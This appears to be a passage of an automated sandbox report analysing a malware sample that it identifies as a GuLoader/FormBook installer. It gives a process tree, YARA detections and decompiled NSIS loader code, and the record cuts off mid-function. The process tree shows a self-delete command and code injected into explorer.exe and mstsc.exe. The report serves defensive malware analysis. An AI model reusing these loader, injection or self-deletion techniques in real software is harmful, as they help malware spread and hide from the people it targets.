Path:	C:\Users\user\Desktop\SC.028UCCP.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SC.028UCCP.exe
Imagebase:	0x400000
File size:	267392 bytes
MD5 hash:	3F8F4A7F43B5627ED45128BB99F0B471
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2936860727.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2936860727.000000000411D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: SC.028UCCP.exePID: 2704, Parent PID: 6716

General

Target ID:	6
Start time:	09:09:00
Start date:	20/03/2023
Path:	C:\Users\user\Desktop\SC.028UCCP.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SC.028UCCP.exe
Imagebase:	0x400000
File size:	267392 bytes
MD5 hash:	3F8F4A7F43B5627ED45128BB99F0B471
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2969977740.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4768, Parent PID: 2704

General

Target ID:	7
Start time:	09:09:14
Start date:	20/03/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6a8130000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.7461101436.000000000AD28000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: mstsc.exePID: 1800, Parent PID: 4768

General

Target ID:	8
Start time:	09:09:19
Start date:	20/03/2023
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mstsc.exe
Imagebase:	0x870000
File size:	1264640 bytes
MD5 hash:	B038F39C887BE2A810E20B08613F3B84
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2296, Parent PID: 1800

General

Target ID:	9
Start time:	09:09:23
Start date:	20/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\SC.028UCCP.exe"
Imagebase:	0x4f0000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4136, Parent PID: 2296

General

Target ID:	10
Start time:	09:09:24
Start date:	20/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7259f0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SC.028UCCP.exePID: 6716, Parent PID: 4768COMMON

Execution Graph

Execution Coverage:	21%
Dynamic/Decrypted Code Coverage:	15.4%
Signature Coverage:	19.1%
Total number of Nodes:	1482
Total number of Limit Nodes:	52

Executed Functions

Function 0040310B Relevance: 80.8, APIs: 27, Strings: 19, Instructions: 324
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			_entry_() {
				int _t38;
				CHAR* _t43;
				char* _t46;
				CHAR* _t48;
				void* _t52;
				intOrPtr _t54;
				int _t56;
				int _t59;
				int _t60;
				int _t64;
				intOrPtr _t78;
				intOrPtr _t84;
				void* _t86;
				signed int _t100;
				void* _t103;
				void* _t108;
				char _t110;
				int _t129;
				int _t130;
				CHAR* _t137;
				int _t138;
				int _t140;
				intOrPtr* _t143;
				char* _t146;
				int _t147;
				void* _t148;
				void* _t149;
				intOrPtr _t156;
				char _t166;

				 *(_t149 + 0x18) = 0;
				 *((intOrPtr*)(_t149 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t149 + 0x20) = 0;
				 *((char*)(_t149 + 0x14)) = 0x20;
				__imp__#17();
				_t38 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec58 = _t38;
				 *0x42eba4 = E00405EC3(8);
				SHGetFileInfoA(0x428fe0, 0, _t149 + 0x38, 0x160, 0); // executed
				E00405B98("Bilsynssteder Setup", "NSIS Error");
				_t43 = GetCommandLineA();
				_t146 = "\"C:\\Users\\Arthur\\Desktop\\SC.028UCCP.exe\"";
				E00405B98(_t146, _t43);
				 *0x42eba0 = GetModuleHandleA(0);
				_t46 = _t146;
				if("\"C:\\Users\\Arthur\\Desktop\\SC.028UCCP.exe\"" == 0x22) {
					 *((char*)(_t149 + 0x14)) = 0x22;
					_t46 =  &M00434001;
				}
				_t48 = CharNextA(E00405670(_t46,  *((intOrPtr*)(_t149 + 0x14))));
				 *(_t149 + 0x1c) = _t48;
				while(1) {
					_t110 =  *_t48;
					_t151 = _t110;
					if(_t110 == 0) {
						break;
					}
					__eflags = _t110 - 0x20;
					if(_t110 != 0x20) {
						L5:
						__eflags =  *_t48 - 0x22;
						 *((char*)(_t149 + 0x14)) = 0x20;
						if( *_t48 == 0x22) {
							_t48 =  &(_t48[1]);
							__eflags = _t48;
							 *((char*)(_t149 + 0x14)) = 0x22;
						}
						__eflags =  *_t48 - 0x2f;
						if( *_t48 != 0x2f) {
							L17:
							_t48 = E00405670(_t48,  *((intOrPtr*)(_t149 + 0x14)));
							__eflags =  *_t48 - 0x22;
							if(__eflags == 0) {
								_t48 =  &(_t48[1]);
								__eflags = _t48;
							}
							continue;
						}
						_t48 =  &(_t48[1]);
						__eflags =  *_t48 - 0x53;
						if( *_t48 != 0x53) {
							L12:
							__eflags =  *_t48 - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | "NCRC");
							if( *_t48 != ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | "NCRC")) {
								L16:
								__eflags =  *((intOrPtr*)(_t48 - 2)) - ((( *0x409173 << 0x00000008 |  *0x409172) << 0x00000008 |  *0x409171) << 0x00000008 | " /D=");
								if( *((intOrPtr*)(_t48 - 2)) == ((( *0x409173 << 0x00000008 |  *0x409172) << 0x00000008 |  *0x409171) << 0x00000008 | " /D=")) {
									 *((char*)(_t48 - 2)) = 0;
									__eflags =  &(_t48[2]);
									E00405B98("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter",  &(_t48[2]));
									break;
								}
								goto L17;
							}
							_t129 = _t48[4];
							__eflags = _t129 - 0x20;
							if(_t129 == 0x20) {
								L15:
								_t13 = _t149 + 0x20;
								 *_t13 =  *(_t149 + 0x20) | 0x00000004;
								__eflags =  *_t13;
								goto L16;
							}
							__eflags = _t129;
							if(_t129 != 0) {
								goto L16;
							}
							goto L15;
						}
						_t130 = _t48[1];
						__eflags = _t130 - 0x20;
						if(_t130 == 0x20) {
							L11:
							 *0x42ec40 = 1;
							goto L12;
						}
						__eflags = _t130;
						if(_t130 != 0) {
							goto L12;
						}
						goto L11;
					} else {
						goto L4;
					}
					do {
						L4:
						_t48 =  &(_t48[1]);
						__eflags =  *_t48 - 0x20;
					} while ( *_t48 == 0x20);
					goto L5;
				}
				_t137 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t137);
				_t52 = E004030D7(_t151);
				_t152 = _t52;
				if(_t52 != 0) {
					L25:
					DeleteFileA("1033"); // executed
					_t54 = E00402C33(_t154,  *(_t149 + 0x20)); // executed
					 *((intOrPtr*)(_t149 + 0x10)) = _t54;
					if(_t54 != 0) {
						L35:
						E00403569();
						__imp__OleUninitialize();
						if( *((intOrPtr*)(_t149 + 0x10)) == 0) {
							__eflags =  *0x42ec34; // 0x0
							if(__eflags != 0) {
								_t147 = E00405EC3(3);
								_t140 = E00405EC3(4);
								_t59 = E00405EC3(5);
								__eflags = _t147;
								_t138 = _t59;
								if(_t147 != 0) {
									__eflags = _t140;
									if(_t140 != 0) {
										__eflags = _t138;
										if(_t138 != 0) {
											_t64 =  *_t147(GetCurrentProcess(), 0x28, _t149 + 0x1c);
											__eflags = _t64;
											if(_t64 != 0) {
												 *_t140(0, "SeShutdownPrivilege", _t149 + 0x28);
												 *(_t149 + 0x3c) = 1;
												 *(_t149 + 0x48) = 2;
												 *_t138( *((intOrPtr*)(_t149 + 0x30)), 0, _t149 + 0x2c, 0, 0, 0);
											}
										}
									}
								}
								_t60 = ExitWindowsEx(2, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									E0040140B(9);
								}
							}
							_t56 =  *0x42ec4c; // 0x2
							__eflags = _t56 - 0xffffffff;
							if(_t56 != 0xffffffff) {
								 *(_t149 + 0x18) = _t56;
							}
							ExitProcess( *(_t149 + 0x18));
						}
						E004053C9( *((intOrPtr*)(_t149 + 0x14)), 0x200010);
						ExitProcess(2);
					}
					_t156 =  *0x42ebbc; // 0x0
					if(_t156 == 0) {
						L34:
						 *0x42ec4c =  *0x42ec4c | 0xffffffff;
						 *(_t149 + 0x18) = E00403643();
						goto L35;
					}
					_t143 = E00405670(_t146, 0);
					if(_t143 < _t146) {
						L31:
						_t161 = _t143 - _t146;
						 *((intOrPtr*)(_t149 + 0x10)) = "Error launching installer";
						if(_t143 < _t146) {
							lstrcatA(_t137, "~nsu.tmp");
							if(lstrcmpiA(_t137, "C:\\Users\\Arthur\\Desktop") == 0) {
								goto L35;
							}
							CreateDirectoryA(_t137, 0);
							SetCurrentDirectoryA(_t137);
							_t166 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter"; // 0x43
							if(_t166 == 0) {
								E00405B98("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter", "C:\\Users\\Arthur\\Desktop");
							}
							E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t149 + 0x1c));
							_t148 = 0x1a;
							do {
								_t78 =  *0x42ebb0; // 0x651b28
								E00405BBA(0, _t137, 0x428be0, 0x428be0,  *((intOrPtr*)(_t78 + 0x120)));
								DeleteFileA(0x428be0);
								if( *((intOrPtr*)(_t149 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\SC.028UCCP.exe", 0x428be0, 1) != 0) {
									E00405A4C(0x428be0, 0);
									_t84 =  *0x42ebb0; // 0x651b28
									E00405BBA(0, _t137, 0x428be0, 0x428be0,  *((intOrPtr*)(_t84 + 0x124)));
									_t86 = E00405368(0x428be0);
									if(_t86 != 0) {
										CloseHandle(_t86);
										 *((intOrPtr*)(_t149 + 0x10)) = 0;
									}
								}
								"46202880" =  &("46202880"[1]);
								_t148 = _t148 - 1;
							} while (_t148 != 0);
							E00405A4C(_t137, 0);
							goto L35;
						}
						 *_t143 = 0;
						_t144 = _t143 + 4;
						if(E00405733(_t161, _t143 + 4) == 0) {
							goto L35;
						}
						E00405B98("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter", _t144);
						E00405B98("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91", _t144);
						 *((intOrPtr*)(_t149 + 0x10)) = 0;
						goto L34;
					}
					_t100 = (( *0x409153 << 0x00000008 |  *0x409152) << 0x00000008 |  *0x409151) << 0x00000008 | " _?=";
					while( *_t143 != _t100) {
						_t143 = _t143 - 1;
						if(_t143 >= _t146) {
							continue;
						}
						goto L31;
					}
					goto L31;
				}
				GetWindowsDirectoryA(_t137, 0x3fb);
				lstrcatA(_t137, "\\Temp");
				_t103 = E004030D7(_t152);
				_t153 = _t103;
				if(_t103 != 0) {
					goto L25;
				}
				GetTempPathA(0x3fc, _t137);
				lstrcatA(_t137, "Low");
				SetEnvironmentVariableA("TEMP", _t137);
				SetEnvironmentVariableA("TMP", _t137);
				_t108 = E004030D7(_t153);
				_t154 = _t108;
				if(_t108 == 0) {
					goto L35;
				}
				goto L25;
			}

0x00403117
0x0040311b
0x00403123
0x00403127
0x0040312c
0x00403137
0x0040313e
0x00403146
0x00403150
0x00403166
0x00403176
0x0040317b
0x00403181
0x00403188
0x0040319b
0x004031a0
0x004031a2
0x004031a4
0x004031a9
0x004031a9
0x004031b9
0x004031bf
0x00403288
0x00403288
0x0040328a
0x0040328c
0x00403292
0x00403292
0x004031c8
0x004031cb
0x004031d3
0x004031d3
0x004031d6
0x004031db
0x004031dd
0x004031dd
0x004031de
0x004031de
0x004031e3
0x004031e6
0x00403278
0x0040327d
0x00403282
0x00403285
0x00403287
0x00403287
0x00403287
0x00000000
0x00403285
0x004031ec
0x004031ed
0x004031f0
0x00403208
0x00403233
0x00403235
0x00403248
0x00403273
0x00403276
0x00403294
0x00403297
0x004032a0
0x00000000
0x004032a0
0x00000000
0x00403276
0x00403237
0x0040323a
0x0040323d
0x00403243
0x00403243
0x00403243
0x00403243
0x00000000
0x00403243
0x0040323f
0x00403241
0x00000000
0x00000000
0x00000000
0x00403241
0x004031f2
0x004031f5
0x004031f8
0x004031fe
0x004031fe
0x00000000
0x004031fe
0x004031fa
0x004031fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004031cd
0x004031cd
0x004031cd
0x004031ce
0x004031ce
0x00000000
0x004031cd
0x004032ab
0x004032b6
0x004032b8
0x004032bd
0x004032bf
0x00403317
0x0040331c
0x00403326
0x0040332d
0x00403331
0x004033c5
0x004033c5
0x004033ca
0x004033d4
0x004034ce
0x004034d4
0x004034df
0x004034e8
0x004034ea
0x004034ef
0x004034f1
0x004034f3
0x004034f5
0x004034f7
0x004034f9
0x004034fb
0x0040350b
0x0040350d
0x0040350f
0x0040351c
0x0040352b
0x00403533
0x0040353b
0x0040353b
0x0040350f
0x004034fb
0x004034f7
0x00403540
0x00403546
0x00403548
0x0040354c
0x0040354c
0x00403548
0x00403551
0x00403556
0x00403559
0x0040355b
0x0040355b
0x00403563
0x00403563
0x004033e3
0x004033ea
0x004033ea
0x00403337
0x0040333d
0x004033b5
0x004033b5
0x004033c1
0x00000000
0x004033c1
0x00403346
0x0040334a
0x00403380
0x00403380
0x00403382
0x0040338a
0x004033f6
0x0040340a
0x00000000
0x00000000
0x0040340e
0x00403415
0x0040341b
0x00403421
0x00403429
0x00403429
0x00403437
0x0040344e
0x0040345c
0x0040345c
0x00403468
0x0040346e
0x00403478
0x0040348e
0x00403493
0x0040349f
0x004034a5
0x004034ac
0x004034af
0x004034b5
0x004034b5
0x004034ac
0x004034b9
0x004034bf
0x004034bf
0x004034c4
0x00000000
0x004034c4
0x0040338c
0x0040338e
0x00403399
0x00000000
0x00000000
0x004033a1
0x004033ac
0x004033b1
0x00000000
0x004033b1
0x00403375
0x00403377
0x0040337b
0x0040337e
0x00000000
0x00000000
0x00000000
0x0040337e
0x00000000
0x00403377
0x004032c7
0x004032d3
0x004032d8
0x004032dd
0x004032df
0x00000000
0x00000000
0x004032e7
0x004032ef
0x00403300
0x00403308
0x0040330a
0x0040330f
0x00403311
0x00000000
0x00000000
0x00000000

APIs

#17.COMCTL32 ref: 0040312C
SetErrorMode.KERNELBASE(00008001), ref: 00403137
OleInitialize.OLE32(00000000), ref: 0040313E

Part of subcall function 00405EC3: GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
Part of subcall function 00405EC3: LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
Part of subcall function 00405EC3: GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1

SHGetFileInfoA.SHELL32(00428FE0,00000000,?,00000160,00000000,00000008), ref: 00403166

Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5

GetCommandLineA.KERNEL32(Bilsynssteder Setup,NSIS Error), ref: 0040317B
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 0040318E
CharNextA.USER32(00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",00000020), ref: 004031B9
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032B6
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C7
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032D3
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032E7
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032EF
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403300
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403308
DeleteFileA.KERNELBASE(1033), ref: 0040331C
OleUninitialize.OLE32(?), ref: 004033CA
ExitProcess.KERNEL32 ref: 004033EA
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000,?), ref: 004033F6
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 00403402
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040340E
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403415
DeleteFileA.KERNEL32(00428BE0,00428BE0,?,kernel32::EnumResourceTypesW(i 0,i r1,i 0),?), ref: 0040346E
CopyFileA.KERNEL32(C:\Users\user\Desktop\SC.028UCCP.exe,00428BE0,00000001), ref: 00403482
CloseHandle.KERNEL32(00000000,00428BE0,00428BE0,?,00428BE0,00000000), ref: 004034AF
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403504
ExitWindowsEx.USER32(00000002,00000000), ref: 00403540
ExitProcess.KERNEL32 ref: 00403563

Strings

Error launching installer, xrefs: 00403382
Low, xrefs: 004032E9
kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 00403432
C:\Users\user\Desktop\SC.028UCCP.exe, xrefs: 0040347D
TMP, xrefs: 00403303
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter, xrefs: 0040329B, 0040339C, 0040341B, 00403424
46202880, xrefs: 00403456, 004034B9
SeShutdownPrivilege, xrefs: 00403516
C:\Users\user\Desktop, xrefs: 004033FB, 00403400, 00403423
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 004033A7
"C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00403181, 00403187, 00403340
TEMP, xrefs: 004032FB
\Temp, xrefs: 004032CD
", xrefs: 004031DE
Bilsynssteder Setup, xrefs: 00403171
~nsu.tmp, xrefs: 004033F0
NSIS Error, xrefs: 0040316C
C:\Users\user\AppData\Local\Temp\, xrefs: 004032AB, 004032B0, 004032C6, 004032D2, 004032E1, 004032EE, 004032FA, 00403302, 004033F5, 00403401, 0040340D, 00403414, 004034C3
1033, xrefs: 00403317

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\SC.028UCCP.exe"$1033$46202880$Bilsynssteder Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91$C:\Users\user\Desktop$C:\Users\user\Desktop\SC.028UCCP.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu.tmp
API String ID: 4107622049-1500559184
Opcode ID: 393541757f93537c9b418c913b57d133516a80a4bf131b4d3cef9bc631cffbd2
Instruction ID: f0167c368e647f3a77010dc3120ed20833c92e3e1e0627bdd261849a200f56ec
Opcode Fuzzy Hash: 393541757f93537c9b418c913b57d133516a80a4bf131b4d3cef9bc631cffbd2
Instruction Fuzzy Hash: ACB116306083816AE7216F719C8DA2B7EA8AB45706F44057FF581762E3C77C9A05CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404822 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00404822(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t179;
				intOrPtr _t180;
				int _t187;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				intOrPtr _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int* _t235;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed int _t244;
				signed int _t247;
				signed char _t248;
				signed int _t249;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t279;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				int _t290;
				signed int _t294;
				intOrPtr _t301;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;
				void* _t326;
				void* _t329;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t179 =  *0x42ebc8; // 0x651d54
				_t318 = SendMessageA;
				_v20 = _t179;
				_t180 =  *0x42ebb0; // 0x651b28
				_t282 = 0;
				_v24 = _t180 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t285;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ebb9 & 0x00000002;
							if(( *0x42ebb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t282;
								if(_v16 != _t282) {
									_t231 = _v16;
									__eflags =  *((intOrPtr*)(_t231 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t232 + 0xc)) - 2;
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
